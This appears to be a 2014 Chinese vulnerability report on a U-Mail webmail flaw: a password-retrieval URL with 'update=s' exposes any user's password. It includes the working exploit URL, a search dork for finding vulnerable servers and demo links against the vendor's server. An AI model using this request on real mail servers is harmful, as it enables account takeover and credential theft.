### 简要描述:
可获取该系统指定用户权限,最近看发这套的人挺多的,不知道我这个你们觉得鸡肋不
### 详细说明:
u-mail取回密码处设计不当,导致任意用户密码可越权查看,当update=s时,可查看任意账户密码
```
http://mail.xxx.com/webmail/getPass.php?email=Services@xxx.com&update=s
```
直接查看指定邮箱账户密码
[<img src="https://images.seebug.org/upload/201405/221647055d477d9bda2dcaadeeff57bef1c63599.png" alt="QQ20140522-1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/221647055d477d9bda2dcaadeeff57bef1c63599.png)
接下来想做什么都可以了。
谷歌: Powered by U-Mail 邮件服务器
[<img src="https://images.seebug.org/upload/201405/22164739089d7cb1ca0a05609137704f1fe65efb.png" alt="QQ20140522-2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/22164739089d7cb1ca0a05609137704f1fe65efb.png)
官网Demo:
http://mail.comingchina.com/webmail/getPass1.php?email=umailtry@comingchina.com&update=s
http://mail.comingchina.com/webmail/getPass2.php?email=umailtry@comingchina.com&update=s
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201405/221647055d477d9bda2dcaadeeff57bef1c63599.png" alt="QQ20140522-1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/221647055d477d9bda2dcaadeeff57bef1c63599.png)
[<img src="https://images.seebug.org/upload/201405/22164739089d7cb1ca0a05609137704f1fe65efb.png" alt="QQ20140522-2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/22164739089d7cb1ca0a05609137704f1fe65efb.png)
京公网安备 11010502034610号
暂无评论